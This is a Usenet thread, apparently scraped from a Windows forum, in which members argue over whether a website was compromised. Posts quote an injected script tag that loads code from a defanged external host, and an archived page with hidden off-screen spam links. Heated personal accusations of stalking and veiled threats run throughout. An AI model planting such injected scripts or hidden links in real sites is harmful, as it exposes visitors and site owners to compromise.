A Windows XP help forum. PCbanter

If this is your first visit, be sure to check out the FAQ by clicking the link above. You may have to register before you can post: click the register link above to proceed. To start viewing messages, select the forum that you want to visit from the selection below.

Go Back   Home » PCbanter forum » Windows 10 » Windows 10 Help Forum
Site Map Home Register Authors List Search Today's Posts Mark Forums Read Web Partners

Insider 16215



 
 
Thread Tools Rate Thread Display Modes
  #31  
Old June 15th 17, 08:50 PM posted to alt.comp.os.windows-10,alt.computer.workshop
Lucifer Morningstar[_2_]
external usenet poster
 
Posts: 368
Default Insider 16215

On Thu, 15 Jun 2017 09:49:56 -0500, Char Jackson
wrote:

On Sun, 11 Jun 2017 19:48:54 +0100, "David B."
wrote:

Philo, whilst we are chatting about scripts, have you any notion of why
this would be on a web site (without the knowledge of the site owner)?

snip

Your 'best guess' will do! ;-)

TIA


Nice! First, engage in a bit of (fake) friendly banter, then smoothly
slip in an innocent-looking request for stalking assistance. That's a
great model, but where have we seen it before? Oh, that's right, it's
what you always do.


I had a website which somehow ended up with malicious code
being added so it can happen.
Ads
  #32  
Old June 16th 17, 08:01 AM posted to alt.comp.os.windows-10,alt.computer.workshop
David B.[_5_]
external usenet poster
 
Posts: 545
Default Insider 16215

On 15/06/2017 20:50, Lucifer Morningstar wrote:
On Thu, 15 Jun 2017 09:49:56 -0500, Char Jackson
wrote:

On Sun, 11 Jun 2017 19:48:54 +0100, "David B."
wrote:

Philo, whilst we are chatting about scripts, have you any notion of why
this would be on a web site (without the knowledge of the site owner)?

snip

Your 'best guess' will do! ;-)

TIA


Nice! First, engage in a bit of (fake) friendly banter, then smoothly
slip in an innocent-looking request for stalking assistance. That's a
great model, but where have we seen it before? Oh, that's right, it's
what you always do.


I had a website which somehow ended up with malicious code
being added so it can happen.


Thanks for so advising, 'LM'.

I'm delighted that you noticed and presumably got rid of same.

I still find it hard to believe that the computer gurus who ran the
www.IdentIt.ca site had no idea that there were hidden SPAM links on
their site ....... for YEARS!!!

As Spock might say ..... "It's not logical"! ;-)

Here's the web site code if you are interested to look:-



html xmlns:fo="http://www.w3.org/1999/XSL/Format"

head


script type="text/javascript" src="/static/js/analytics.js"/script
script
type="text/javascript"archive_analytics.values.server_name=" wwwb-app13.us.archive.org";archive_analytics.values.ser ver_ms=379;/script
link type="text/css" rel="stylesheet"
href="/static/css/banner-styles.css"/









titleWelcome to IdentIT Inc. - Home/title
meta name="KEYWORDS" content="public key infrastructure, security
consulting, certificate lifecycle manager, CLM, VPN, windows rights
management services, RMS"
link href="/web/20161002161328cs_/http://identit.ca/css/styles.css"
rel="stylesheet" type="text/css"
/head

body marginwidth="0" marginheight="0" leftmargin="0" topmargin="0"
bottommargin="0" rightmargin="0"


!-- BEGIN WAYBACK TOOLBAR INSERT --
script type="text/javascript" src="/static/js/disclaim-element.js"
/script

script type="text/javascript" src="/static/js/graph-calc.js" /script
script type="text/javascript"//![CDATA[
var __wm = (function(imgWidth,imgHeight,yearImgWidth,monthImg Width){
var wbPrefix = "/web/";
var wbCurrentUrl = "http://identit.ca/";

var firstYear = 1996;
var displayDay = "2";
var displayMonth = "Oct";
var displayYear = "2016";
var prettyMonths =
["Jan","Feb","Mar","Apr","May","Jun","Jul","Aug","S ep","Oct","Nov","Dec"];
var $D=document,$=function(n){return document.getElementById(n)};
var trackerVal,curYear = -1,curMonth = -1;
var yearTracker,monthTracker;
function showTrackers(val) {
if (val===trackerVal) return;
var $ipp=$("wm-ipp");
var $y=$("displayYearEl"),$m=$("displayMonthEl"),$d=$( "displayDayEl");
if (val) {
$ipp.className="hi";
} else {
$ipp.className="";

$y.innerHTML=displayYear;$m.innerHTML=displayMonth ;$d.innerHTML=displayDay;
}
yearTracker.style.display=val?"inline":"none";
monthTracker.style.display=val?"inline":"none";
trackerVal = val;
}
function trackMouseMove(event,element) {
var eventX = getEventX(event);
var elementX = getElementX(element);
var xOff = Math.min(Math.max(0, eventX - elementX),imgWidth);
var monthOff = xOff % yearImgWidth;

var year = Math.floor(xOff / yearImgWidth);
var monthOfYear = Math.min(11,Math.floor(monthOff / monthImgWidth));
// 1 extra border pixel at the left edge of the year:
var month = (year * 12) + monthOfYear;
var day = monthOff % 2==1?15:1;
var dateString = zeroPad(year + firstYear) + zeroPad(monthOfYear+1,2) +
zeroPad(day,2) + "000000";

$("displayYearEl").innerHTML=year+firstYear;
$("displayMonthEl").innerHTML=prettyMonths[monthOfYear];
// looks too jarring when it changes..
//$("displayDayEl").innerHTML=zeroPad(day,2);
var url = wbPrefix + dateString + '/' + wbCurrentUrl;
$("wm-graph-anchor").href=url;

if(curYear != year) {
var yrOff = year * yearImgWidth;
yearTracker.style.left = yrOff + "px";
curYear = year;
}
if(curMonth != month) {
var mtOff = year + (month * monthImgWidth) + 1;
monthTracker.style.left = mtOff + "px";
curMonth = month;
}
}
function hideToolbar() {
$("wm-ipp").style.display="none";
}
function bootstrap() {
var $spk=$("wm-ipp-sparkline");
yearTracker=$D.createElement('div');
yearTracker.className='yt';
with(yearTracker.style){
display='none';width=yearImgWidth+"px";height=imgH eight+"px";
}
monthTracker=$D.createElement('div');
monthTracker.className='mt';
with(monthTracker.style){
display='none';width=monthImgWidth+"px";height=img Height+"px";
}
$spk.appendChild(yearTracker);
$spk.appendChild(monthTracker);

var $ipp=$("wm-ipp");
$ipp&&disclaimElement($ipp);
}
return{st:showTrackers,mv:trackMouseMove,h:hideToo lbar,bt:bootstrap};
})(550, 27, 25, 2);//]]
/script
style type="text/css"
body {
margin-top:0 !important;
padding-top:0 !important;
min-width:800px !important;
}
/style
div id="wm-ipp" lang="en" style="display:none;"

div style="position:fixed;left:0;top:0;width:100%!impo rtant"
div id="wm-ipp-inside"
table style="width:100%;"tbodytr
td id="wm-logo"
a href="/web/" title="Wayback Machine home page"img
src="/static/images/toolbar/wayback-toolbar-logo.png" alt="Wayback
Machine" width="110" height="39" border="0" //a
/td
td class="c"
table style="margin:0 auto;"tbodytr
td class="u" colspan="2"
form target="_top" method="get" action="/web/form-submit.jsp"
name="wmtb" id="wmtb"input type="text" name="url" id="wmtbURL"
value="http://identit.ca/" style="width:400px;"
onfocus="this.focus();this.select();" /input type="hidden" name="type"
value="replay" /input type="hidden" name="date" value="20161002161328"
/input type="submit" value="Go" /span id="wm_tb_options"
style="display:block;"/span/form
/td
td class="n" rowspan="2"
tabletbody
!-- NEXT/PREV MONTH NAV AND MONTH INDICATOR --
tr class="m"
td class="b" nowrap="nowrap"

a href="/web/20160718214814/http://identit.ca/" title="18
Jul 2016"JUL/a

/td
td class="c" id="displayMonthEl" title="You are he 16:13:28
Oct 2, 2016"OCT/td
td class="f" nowrap="nowrap"

a href="/web/20170124200612/http://Identit.ca" title="24
Jan 2017"strongJAN/strong/a

/td
/tr
!-- NEXT/PREV CAPTURE NAV AND DAY OF MONTH INDICATOR --
tr class="d"
td class="b" nowrap="nowrap"

a href="/web/20160718214814/http://identit.ca/"
title="21:48:14 Jul 18, 2016"img
src="/static/images/toolbar/wm_tb_prv_on.png" alt="Previous capture"
width="14" height="16" border="0" //a

/td
td class="c" id="displayDayEl"
style="width:34px;font-size:24px;" title="You are he 16:13:28 Oct 2,
2016"2/td
td class="f" nowrap="nowrap"

a href="/web/20170124200612/http://Identit.ca"
title="20:06:12 Jan 24, 2017"img
src="/static/images/toolbar/wm_tb_nxt_on.png" alt="Next capture"
width="14" height="16" border="0" //a

/td
/tr
!-- NEXT/PREV YEAR NAV AND YEAR INDICATOR --
tr class="y"
td class="b" nowrap="nowrap"

a href="/web/20150812015332/http://www.identit.ca/"
title="12 Aug 2015"strong2015/strong/a

/td
td class="c" id="displayYearEl" title="You are he
16:13:28 Oct 2, 2016"2016/td
td class="f" nowrap="nowrap"

2017

/td
/tr
/tbody/table
/td
/tr
tr
td class="s"
a class="t" href="/web/20161002161328*/http://identit.ca/"
title="See a list of every capture for this URL"65 captures/a
div class="r" title="Timespan for captures of this URL"3
Feb 06 - 24 Jan 17/div
/td
td class="k"
a href="" id="wm-graph-anchor"
div id="wm-ipp-sparkline" title="Explore captures for this URL"
img id="sparklineImgId" alt="sparklines"
onmouseover="__wm.st(1)" onmouseout="__wm.st(0)"
onmousemove="__wm.mv(event,this)"
width="550"
height="27"
border="0"

src="/web/jsp/graph.jsp?graphdata=550_27_1996:-1:000000000000_1997:-1:000000000000_1998:-1:000000000000_1999:-1:000000000000_2000:-1:000000000000_2001:-1:000000000000_2002:-1:000000000000_2003:-1:000000000000_2004:-1:000000000000_2005:-1:000000000000_2006:-1:020201053201_2007:-1:020200010200_2008:-1:000000000020_2009:-1:100110000000_2010:-1:000100000000_2011:-1:000000002211_2012:-1:002000000001_2013:-1:000003112000_2014:-1:100020001000_2015:-1:001201020200_2016:9:101111100100_2017:-1:100000000000"
/
/div
/a
/td
/tr/tbody/table
/td
td class="r"
a href="#close" onclick="__wm.h();return false;"
style="background-image:url(/static/images/toolbar/wm_tb_close.png);top:5px;"
title="Close the toolbar"Close/a
a href="http://faq.web.archive.org/"
style="background-image:url(/static/images/toolbar/wm_tb_help.png);bottom:5px;"
title="Get some help using the Wayback Machine"Help/a
/td
/tr/tbody/table
/div
/div
/div
script type="text/javascript"__wm.bt();/script
!-- END WAYBACK TOOLBAR INSERT --






table cellpadding="0" cellspacing="0" border="0" width="100%"
height="100%" class="alltable"
tr height="317"
td colspan="2" style="

background:url(/web/20161002161328im_/http://identit.ca/images/top.jpg)
top left no-repeat;
"
table cellpadding="0" cellspacing="0" border="0" width="100%"
tr height="192"
td style="padding:0px 0px 5px 530px;"
img
src="/web/20161002161328im_/http://identit.ca/images/IdentITLogoRoundIII.gif"
border="0" alt="" width="216" height="76"table cellpadding="0"
cellspacing="0" border="0" id="table1"
tr
td /td
td style="padding-left:8px;"
div class="mycompany"
IdentIT Inc./div
div class="slogan"
/div
/td
/tr
/table
p /p
/td
/tr
tr height="42"
td
table cellpadding="0" cellspacing="0" border="0"
height="42"
tr
td
div style="width:458px; height:0px; float:left;"
spacer/spacer/div
/td
td class="menuitemactive1"
img
src="/web/20161002161328im_/http://identit.ca/images/mark.gif"
width="17" height="14" border="0" alt=""br
Home/td
td class="menudivider1"
div style="width:16px; height:0px;"
spacer/spacer/div
/td
td class="menuitem1"a
href="/web/20161002161328/http://identit.ca/services.html"
img
src="/web/20161002161328im_/http://identit.ca/images/mark.gif"
width="17" height="14" border="0" alt=""br
Services/a/td
td class="menudivider1"
div style="width:16px; height:0px;"
spacer/spacer/div
/td
td class="menuitem1"
img
src="/web/20161002161328im_/http://identit.ca/images/mark.gif"
width="17" height="14" border="0" alt=""br
font face="Tahoma"a
href="/web/20161002161328/http://identit.ca/about.html"About
Us/a/font/td
td class="menudivider1"
div style="width:16px; height:0px;"
spacer/spacer/div
/td
td class="menuitem1"a
href="/web/20161002161328/http://identit.ca/contact.html"
img
src="/web/20161002161328im_/http://identit.ca/images/mark.gif"
width="17" height="14" border="0" alt=""br
Contact Us/a/td
/tr
/table
/td
/tr
tr height="83"
td/td
/tr
/table
/td
/tr
tr height="100%"
td bgcolor="#F4F5F7" valign="top"
div style="width:170px; height:0px;"
spacer/spacer
table cellpadding="0" cellspacing="0" border="0" width="100%"
style="background:#ffffff
url(/web/20161002161328im_/http://identit.ca/images/2ndmenu_bottom.gif)
bottom right no-repeat;" id="table2"
tr
td style="padding:13px 13px 25px 12px;"
table cellpadding="0" cellspacing="0" border="0"
width="100%" id="table3"
tr
td class="secondmenumark"a
href="/web/20161002161328/http://identit.ca/methodology.html"
img
src="/web/20161002161328im_/http://identit.ca/images/2ndmenu_mark.gif"
width="14" height="14" border="0" alt=""/a/td
td class="secondmenuitem"uHome/u/td
/tr
tr
td class="secondmenumark"a
href="/web/20161002161328/http://identit.ca/methodology.html"
img
src="/web/20161002161328im_/http://identit.ca/images/2ndmenu_mark.gif"
width="14" height="14" border="0" alt=""/a/td
td class="secondmenuitem"a
href="/web/20161002161328/http://identit.ca/services.html"
Services/a/td
/tr
tr
td class="secondmenumark" /td
td class="secondmenuitem" align="right"
a
href="/web/20161002161328/http://identit.ca/methodology.html"Engagement
Methodology/a/td
/tr
tr
td colspan="2" class="secondmenudivider"/td
/tr
tr
td class="secondmenumark" /td
td class="secondmenuitem" align="right"
a
href="/web/20161002161328/http://identit.ca/pki.html"Public Key
Infrastructur/ae/td
/tr
tr
td colspan="2" class="secondmenudivider"/td
/tr
tr
td class="secondmenumark" /td
td class="secondmenuitem" align="right"
a
href="/web/20161002161328/http://identit.ca/iam.html"Identity and
Access Management/a/td
/tr
tr
td colspan="2" class="secondmenudivider"/td
/tr
tr
td class="secondmenumark" /td
td class="secondmenuitem" align="right"
a
href="/web/20161002161328/http://identit.ca/policy.html"Security
Policy Authoring/a/td
/tr
tr
td colspan="2" class="secondmenudivider"/td
/tr
tr
td class="secondmenumark" /td
td class="secondmenuitem" align="right"
a
href="/web/20161002161328/http://identit.ca/vpn.html"VPN
Quarantine/a/td
/tr
tr
td colspan="2" class="secondmenudivider"/td
/tr
tr
td class="secondmenumark" /td
td class="secondmenuitem" align="right"
a
href="/web/20161002161328/http://identit.ca/rms.html"Windows Rights
Management Services/a/td
/tr
tr
td colspan="2" class="secondmenudivider"/td
/tr
tr
td class="secondmenumark" /td
td class="secondmenuitem" align="right"
a
href="/web/20161002161328/http://identit.ca/clm.html"Microsoft Identity
Lifecycle Manager
2007/a /td
/tr
tr
td class="secondmenumark"a
href="/web/20161002161328/http://identit.ca/methodology.html"
img
src="/web/20161002161328im_/http://identit.ca/images/2ndmenu_mark.gif"
width="14" height="14" border="0" alt=""/a/td
td class="secondmenuitem"a
href="/web/20161002161328/http://identit.ca/about.html"About Us/a/td
/tr
tr
td class="secondmenumark" /td
td class="secondmenuitem" align="right"
 a
href="/web/20161002161328/http://identit.ca/management.html"Management
Team/a/td
/tr
tr
td class="secondmenumark" /td
td class="secondmenuitem" align="right"
a
href="/web/20161002161328/http://identit.ca/clients.html"Clients/a/td
/tr
tr
td class="secondmenumark" /td
td class="secondmenuitem" align="right"
a
href="/web/20161002161328/http://identit.ca/events.html"Events/a/td
/tr
tr
td class="secondmenumark"a
href="/web/20161002161328/http://identit.ca/methodology.html"
img
src="/web/20161002161328im_/http://identit.ca/images/2ndmenu_mark.gif"
width="14" height="14" border="0" alt=""/a/td
td class="secondmenuitem"a
href="/web/20161002161328/http://identit.ca/contact.html"
Contact Us/a/td
/tr
/table
/td
/tr
/table
/div
/td
td width="100%" bgcolor="#F4F5F7" valign="top"
table cellpadding="0" cellspacing="0" border="0" width="100%"
tr height="65"
td class="pageheader-bg"
table cellpadding="0" cellspacing="0" border="0"
width="100%" height="65"
tr
td class="pageheader"
style="background:url(/web/20161002161328im_/http://identit.ca/images/pageheader_bg.gif)
top left no-repeat; padding:0px 20px 3px 31px;"
Home/td
/tr
/table
/td
/tr
tr
td class="thatext" style="padding:0px 37px 15px
31px;"span
h2Welcome to IdentIT Inc./h2
p style="text-align: left"span style="FONT-FAMILY:
verdana"
font size="2"One of your
most valuable corporate assets is information, and
protecting and
securing data access is vital to conducting business in
today's
knowledge-based economy./font/span/p
p style="text-align: left"span style="FONT-FAMILY:
verdana"
font size="2"With evolving
threats to intellectual property security and
information expanding
at an increasing rate, there is no single solution to
mitigate these
ever-changing risks. Rather than attempting to force a
single solution,
security is best achieved through a comprehensive
assessment of
your organization's technical, procedural, policy,
legal, regulatory
and management requirements and then architecting and
implementing
solutions that meet your needs./font/span/p
p style="text-align: left"span style="FONT-FAMILY:
verdana"
font size="2"IdentIT Inc.
specializes in strong security-related services and
solutions, with
the majority of our practice focused on digital
security, identity
management and access authorization, digital rights
management,
and secure remote access solutions./font/span/p
h4IdentIT Inc. offers ILM 2007
Certificate Management Training/h4
pfont size="2"IdentIT Inc. is pleased to offer private,
dedicated training on ILM 2007 Certificate Management.
If your
organization is interested in this training, please
contact us
at b
a
?subject=CLM%20Training%20Re quest"
/a/b./font/p
h4IdentIT Inc. announced as Systems Integrator for
Certificate
Lifecycle Manager/h4
pfont size="2"Microsoft announced IdentIT Inc. as
one of the
first systems integrators for Certificate Lifecycle
Manager.
Details are available at the
a
href="/web/20161002161328/http://www.microsoft.com/technet/clm/partners.mspx"
Microsoft CLM Web portal/a. /font
/p
h4
Brian Komar Interviewed on RunAs Radio/h4
pfont size="2"Brian Komar, President of IdentIT
Inc., was
interviewed by Richard Campbell and Greg Hughes about
the Public
Key Infrastructure (PKI), Extended Validation (EV)
Certificates
and whether or not anybody notices the green bar in
Internet
Explorer 7. The show can be listened to on demand from
a
href="/web/20161002161328/http://www.runasradio.com/default.aspx?showNum=8"this
location/a./font/p
h4Brian Komar to Author the 2nd Edition of the
Microsoft Press
PKI Book/h4
pfont size="2"Brian Komar, President of IdentIT
Inc., has
started writing the second edition of bMicrosoft Windows
Server(TM) 2003 PKI and Certificate Security. /bThe new
edition will cover the Windows Server 2008 PKI and extend
coverage of certificate-based application deployment.
Paul Adare,
CTO of IdentIT Inc. is acting as the technical editor
for the
project./font/p
/span/td
/tr
/table
/td
/tr
tr height="28"
td class="bottommenu-color"/td
td class="bottommenu-color" style="padding-left:31px;"
table cellpadding="0" cellspacing="0" border="0"
tr
td class="bottommenuitemactive"Home/td
td class="bottommenudivider"
div style="width:17px; height:0px;"
spacer/spacer/div
/tddiv style="position: absolute; width: 31px;
height: 87x; z-index: 2; left: -857px; top: 68px" id="layer3"marquee
scrollDelay="1044" align="middle" border="0"a
href="/web/20161002161328/http://www.nikeairmaxsite.com/"nike air max
sneakers/aa
href="/web/20161002161328/http://www.toplacoste.com/"Lacoste
Outlet/aa
href="/web/20161002161328/http://www.nikedunksales.com/nikesbdunkhigh-c-7.html"nike
dunk high/aa
href="/web/20161002161328/http://www.frchristianlouboutin.com/"christian
louboutin sale/aa
href="/web/20161002161328/http://www.nikedunksales.com/"nike dunk/aa
href="/web/20161002161328/http://www.nikedunksales.com/nikesbdunkmid-c-13.html"nike
dunk mid/aa
href="/web/20161002161328/http://www.frchristianlouboutin.com/christian-louboutin-shoes-c-5.html"christian
louboutin shoes/aa
href="/web/20161002161328/http://www.lebronsky.com/kobebryant-c-21.html"kobe
bryant shoes/aa
href="/web/20161002161328/http://www.airforce1fashion.com/air-force-1-premium-mid-c-239.html"air
force one mid/aa
href="/web/20161002161328/http://www.frchristianlouboutin.com/"christian
louboutin discount/aa
href="/web/20161002161328/http://www.lebronsky.com/kobebryantnikezoomkobev5-c-21_28.html"kobe
v/a/marquee/div
td class="bottommenuitem"a
href="/web/20161002161328/http://identit.ca/services.html"Services/a/td
td class="bottommenudivider"
div style="width:17px; height:0px;"
spacer/spacer/div
/td
td class="bottommenuitem"a
href="/web/20161002161328/http://identit.ca/about.html"About Us/a/td
td class="bottommenudivider"
div style="width:17px; height:0px;"
spacer/spacer/div
/td
td class="bottommenuitem"a
href="/web/20161002161328/http://identit.ca/contact.html"Contact
Us/a/td
/tr
/table
/td
/tr
tr height="46"
td bgcolor="#ffffff"/td
td bgcolor="#ffffff" style="padding-left:31px;"
class="copy"All Rights
Reserved.../td
/tr
/table

/body

/html




!--
FILE ARCHIVED ON 16:13:28 Oct 2, 2016 AND RETRIEVED FROM THE
INTERNET ARCHIVE ON 8:11:09 Mar 16, 2017.
JAVASCRIPT APPENDED BY WAYBACK MACHINE, COPYRIGHT INTERNET ARCHIVE.

ALL OTHER CONTENT MAY ALSO BE PROTECTED BY COPYRIGHT (17 U.S.C.
SECTION 108(a)(3)).
--

--
"Do something wonderful, people may imitate it." (Albert Schweitzer)
"The important thing is not to stop questioning."
- Albert Einstein

--
Regards,
David B.
  #33  
Old June 16th 17, 09:28 AM posted to alt.comp.os.windows-10,alt.computer.workshop,alt.comp.freeware
David B.[_5_]
external usenet poster
 
Posts: 545
Default *WARNING* (was Insider 16215)

On 11/06/2017 23:57, Beauregard T. Shagnasty wrote:
David B. STALKER wrote:

On 11/06/2017 21:02, Beauregard T. Shagnasty wrote:

KWIT STALKING! Reread my offer to you.


I've unearthed this infrmation about your web site. I will investigate
further tomorrow:-


Save your energy. Do something worthwhile. Turn off your computer and take
your wife to dinner.


We went for lunch instead! :-)

I expect you recall our discussions way back - when I trusted you?

https://groups.google.com/forum/#!ms...I/joPjR_goRDcJ

THAT is when I SHOULD have smelled a rat about you, eh?!!!

--
"Do something wonderful, people may imitate it."
  #34  
Old June 18th 17, 12:02 AM posted to alt.comp.os.windows-10,alt.computer.workshop
David B.[_8_]
external usenet poster
 
Posts: 159
Default Insider 16215

On 6/17/2017 12:34 PM, Diesel wrote:
So, do be careful who you paint with that
'criminal' brush, ok?


OK. As I've said elsewhere ....

" ... as far as taking YOU down, I've asked Nate Glass to nail you to a
cross on my behalf. He will get all the credit; great advertising for
his businees, eh?!! Listen out for that knock on your door sometime
soon, Dustin. You took things just a step too far.

http://takedownpiracy.com/tag/nate-glass/

It's a shame you couldn't see the wood for the trees."

--
Sometimes man stumbles over the truth. (W.Churchill)
  #35  
Old June 18th 17, 01:52 PM posted to alt.comp.os.windows-10,alt.computer.workshop
Diesel
external usenet poster
 
Posts: 937
Default Insider 16215

"David B."
Sat, 17 Jun 2017 23:02:02 GMT in
alt.computer.workshop, wrote:

On 6/17/2017 12:34 PM, Diesel wrote:
So, do be careful who you paint with that
'criminal' brush, ok?


OK.


Great. We're making progress, then. /sarcasm

As I've said elsewhere ....
" ... as far as taking YOU down, I've asked Nate Glass to nail you
to a cross on my behalf. He will get all the credit; great
advertising for his businees, eh?!! Listen out for that knock on
your door sometime soon, Dustin. You took things just a step too
far.

http://takedownpiracy.com/tag/nate-glass/


Yep. read this earlier. What do you actually expect him to be able to
do, though? We don't have any sites for him to send a DMCA notice
to...*shrug*

It's a shame you couldn't see the wood for the trees."


ROFL. David,

I offered you several cease fire agreements. You've yet to accept
*any* of them. So...




--
https://tekrider.net/pages/david-brooks-stalker.php

If a string has one end, then it has another end.
  #36  
Old May 20th 19, 06:03 PM posted to alt.comp.os.windows-10,alt.computer.workshop,alt.comp.freeware
David B.[_15_]
external usenet poster
 
Posts: 57
Default *WARNING* (was Insider 16215)

On 11/06/2017 21:07, Beauregard T. Shagnasty wrote:
David B. - trying to be helpful, wrote:


https://www.virustotal.com/en/url/70...is/1497210967/


You are so lame. They ran 64 scanners at that URL.

2 gave a false positive. **62** said it is a _Clean site_.

You need to stop using tools you know nothing about!


There are now *SIX* findings

https://www.virustotal.com/gui/url/a...250e/detection

All false positives?

Maybe they are. I'm just trying to establish the truth/facts.

--
David B.
Devon, UK
  #37  
Old May 20th 19, 08:32 PM posted to alt.computer.workshop,alt.comp.os.windows-10
David B.[_7_]
external usenet poster
 
Posts: 195
Default *WARNING* (was Insider 16215)

*MALWARE WARNING*!
*****************



On 20/05/2019 19:52, Mike Easter wrote:
David B. wrote:
On 20/05/2019 17:38, David B. added ...
On Friday, 16 June 2017 09:38:41 UTC+1, David B.Â* wrote:
On 11/06/2017 21:23, Mike Easter wrote:


Notice those old 2017 dates; this was all discussed in acf back then.Â* A
multipage 169 msg GG thread can be seen he
https://groups.google.com/forum/embe...vz4A%5B1-25%5D


This isn't about freeware.Â* f/ups acw.


Char Jackson has just posted this:-

Message-ID:

=

Idiot, you're trying to scan a page that doesn't exist.

###
HTTP/1.1 404 Not Found

td
http://windows-web-browsers.co.cc
tr
td
Sorry, that page doesn’t exist!
tr
###

=

He's completely *WRONG*! Perhaps he's already infected!

This web page *DOES* exist! hxxp://windows-web-browsers.co.cc

(Remove xx and insert tt to make live)

*This malware is resident on the page*:-

https://www.sophos.com/en-us//threat...HTMLGen-A.aspx

--
David B.
Devon, UK
  #38  
Old May 20th 19, 09:48 PM posted to alt.computer.workshop,alt.comp.os.windows-10,alt.comp.freeware
David B.[_15_]
external usenet poster
 
Posts: 57
Default *WARNING* (was Insider 16215)

On 20/05/2019 21:24, Mike Easter wrote:
David B. wrote:
*MALWARE WARNING*!


This is all a fool's mission.

First, the page in question isn't there, except as a place holder:

The VT link you posted is stale:
https://www.virustotal.com/gui/url/a...250e/detection


about: http://windows-web-browsers.co.cc/alert but processed 2019-04-29
22:46:27 UTC 20 days ago

... and if you feed again the same URL, it doesn't 'reprocess' - it
simply refers back to the stale result.

A curl or wget or browser view of the above /alert link gives a title of
the link w/o the alert path and says the page doesn't exist as Char
described and also refers the reader to the http://co.cc page.

Second, the 'link' you are examining has little to do w/ the
tekrider.net content which as discussed in 2017 was hxxp, not http.

You are manufacturing all these bolded and capped warnings about
'nothing'.Â* If VT has some positives about a page that is no longer
accessible, and was NEVER accessible from anything to do w/ your target
BTS tekrider site, then the noise is about nothing.



Sadly, it is *YOU* who is mistaken, Mike.

You can check out the links he-

https://www.virustotal.com/gui/domai...o.cc/relations

I've brought all of them up-to-date!

One doesn't get warnings like this if a site is not 'live'!

Comments from other folk welcomed.

--
David B.
Devon, UK
  #39  
Old May 20th 19, 09:52 PM posted to alt.computer.workshop,alt.comp.os.windows-10,alt.comp.freeware
David B.[_15_]
external usenet poster
 
Posts: 57
Default *WARNING* (was Insider 16215)

On 20/05/2019 21:48, David B. wrote:
One doesn't get warnings like this if a site is not 'live'!


https://imgur.com/gallery/pS2VeDb

Apologies for not including the link!

--
David B.
Devon, UK
  #40  
Old May 20th 19, 11:12 PM posted to alt.computer.workshop,alt.comp.os.windows-10
David B.[_15_]
external usenet poster
 
Posts: 57
Default *WARNING* (was Insider 16215)

On 20/05/2019 22:05, Char Jackson wrote:
You'll have to explain how malware can be present on a page that doesn't
exist. Good luck with that.


https://imgur.com/gallery/pS2VeDb

Affected Operating Systems

Windows ------- Group reinstated!

Mal/HTMLGen-A is the threat name associated with web content blocked by
Sophos products using the reputation filtering functionality.

Note: Mal/HTMLGen-A is not detection of a malware payload on an infected
machine. Instead it indicates a Sophos product blocking access to a
remote website we believe to be either malicious (a site whose sole
purpose is to infect users with malware) or compromised (a legitimate
site, but one that has been hacked in order to infect or redirect users).

If you believe the current classification is incorrect, please use the
following form to submit the site for re-evaluation:

https://www.sophos.com/en-us/support...se/119440.aspx

HTH

--
David B.
Devon, UK
  #41  
Old May 21st 19, 07:07 AM posted to alt.computer.workshop,alt.comp.os.windows-10
David B.[_15_]
external usenet poster
 
Posts: 57
Default *WARNING* (was Insider 16215)

On 21/05/2019 04:01, Char Jackson wrote:
On Mon, 20 May 2019 23:12:06 +0100, "David B."
wrote:

On 20/05/2019 22:05, Char Jackson wrote:
You'll have to explain how malware can be present on a page that doesn't
exist. Good luck with that.


https://imgur.com/gallery/pS2VeDb

Affected Operating Systems

Windows ------- Group reinstated!


Nothing to do with Windows 10, so that group was removed. You clearly
don't know any better, so you'll probably add it back. Your ignorance is
on full display.


Added back! :-)

1. You promised not to reply to me. It took almost zero time for you to
break your promise. I'm disappointed in you, but not surprised. You
probably forgot.


You NEVER listen properly. I said in an earlier post ....



"If you wish to receive any responses from me, do NOT include links to
the suspect Tekrider website in your posts OR 'signature'."

When you check, you'll notice that you had NOT added such a signature on
this occasion.

2. How is it going with coming up with an explanation for how malware
can be present on a placeholder page? Are you making any progress?


No - I handed the gamut to Mike Easter (but it appears that he's not
going to bother).

It's ok, you can admit that you screwed up as a result of your
ignorance. Everyone knows it anyway.


I go by what I see. The original 'code' was associated with the Tekrider
website - access to which has effectively been closed down by the site
owner. Perhaps YOU should ask him why an honest man would do that.

--
David B.
Devon, UK
  #42  
Old May 21st 19, 08:30 AM posted to alt.computer.workshop,alt.comp.os.windows-10
David B.[_15_]
external usenet poster
 
Posts: 57
Default *WARNING* (was Insider 16215)

On 21/05/2019 07:07, David B. wrote:
I go by what I see. The original 'code' was associated with the Tekrider
website - access to which has effectively been closed down by the site
owner. Perhaps YOU should ask him why an honest man would do that.


I quote:-

Philo, whilst we are chatting about scripts, have you any notion of why
this would be on a web site (without the knowledge of the site owner)?

!-- [if IE]
sc​ript type="text/javascript"
src=hxxp://windows-web-browsers.co.cc/alert/"
/ sc​ript
!-- [endif]--
div IE sc​ript here /div

Your 'best guess' will do!

=

Remember that? That 'code' was found not only by Sucuri but by Redleg
(Aw-Snap) too!

https://i.imgur.com/aBgpvlO.png

Btw, Sucuri seems to think there *IS* a website ....

https://sitecheck.sucuri.net/results...browsers.co.cc

HTH

--
David B.
Devon, UK
  #43  
Old May 21st 19, 08:46 AM posted to alt.comp.os.windows-10,alt.computer.workshop
David B.[_15_]
external usenet poster
 
Posts: 57
Default Char Jackson - a reminder! (was - Insider 16215)

On 15/06/2017 16:23, David B. wrote:
On 15/06/2017 15:49, Char Jackson wrote:
On Sun, 11 Jun 2017 19:48:54 +0100, "David B."
wrote:

Philo, whilst we are chatting about scripts, have you any notion of why
this would be on a web site (without the knowledge of the site owner)?


!-- [if IE]
sc​ript type="text/javascript"
src=hxxp://windows-web-browsers.co.cc/alert/"
/ sc​ript
!-- [endif]--
div IE sc​ript here /div

Your 'best guess' will do!

TIA


Nice! First, engage in a bit of (fake) friendly banter, then smoothly
slip in an innocent-looking request for stalking assistance. That's a
great model, but where have we seen it before? Oh, that's right, it's
what you always do.


Nothing fake in our relationship, Char. Truly! :-)

Philo has been a Facebook friend of mine for years. I've purchased his
book of photographs AND the book of paintings published by his wife.

If you'd like a copy of Philo's book , it's available from Amazon, he-

https://www.amazon.com/Kochanskis-Co...dp/1466441682/


You might enjoy this item about Colleen and her work:-

http://shepherdexpress.com/article-2...d-express.html


HTH :-D

--
David B.
Devon, UK
  #44  
Old May 21st 19, 08:56 AM posted to alt.comp.os.windows-10,alt.computer.workshop
David B.[_15_]
external usenet poster
 
Posts: 57
Default Char Jackson - a reminder! (was - Insider 16215)

Be sure to watch the video!

https://www.youtube.com/watch?time_c...&v=U6f-eAzCxP8

--
David B.
Devon, UK
  #45  
Old May 21st 19, 09:25 AM posted to alt.comp.os.windows-10,alt.computer.workshop,free.spam
